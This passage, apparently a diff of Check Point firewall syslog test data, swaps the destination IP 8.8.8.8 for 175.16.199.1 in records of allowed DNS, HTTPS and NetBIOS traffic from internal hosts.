service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:23:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e786,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506182"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45454"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T18:23:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e786,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"99.86.116.53"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"32892"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T18:23:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e787,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"52.166.113.188"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38206"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T18:23:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e787,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506183"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56777"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:23:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e787,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506183"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57808"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:23:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e787,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506183"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42038"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:23:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e787,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506183"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56777"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:23:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e787,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506183"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57808"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:23:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e787,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506183"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42038"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T18:23:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e787,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.95"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50592"; service:"443"; service_id:"https"; 
src:"192.168.2.2"] -<134>1 2020-03-29T18:23:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e789,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506185"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34158"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:23:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e789,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506185"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51500"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:23:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e789,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506185"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34158"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:23:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e789,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506185"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51500"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T18:23:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e789,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"23.100.50.51"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37020"; service:"443"; service_id:"https"; 
src:"192.168.2.2"] <134>1 2020-03-29T18:23:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e78a,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"138"; service:"138"; service_id:"nbdatagram"; src:"192.168.1.117"] -<134>1 2020-03-29T18:23:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e78d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506189"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58753"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:23:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e78d,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506189"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33964"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:23:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e78d,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506189"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54217"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:23:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e78d,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506189"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38045"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:23:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e78d,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506189"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34399"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:23:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e78d,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506189"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57420"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:23:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e78d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506189"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58753"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:23:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e78d,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506189"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33964"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:23:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e78d,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506189"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54217"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:23:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e78d,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506189"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38045"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:23:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e78d,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506189"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34399"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:23:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e78d,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506189"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57420"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T18:23:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e78d,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"13.48.233.241"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"59002"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T18:23:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e78e,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506190"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36179"; service:"53"; service_id:"domain-udp"; 
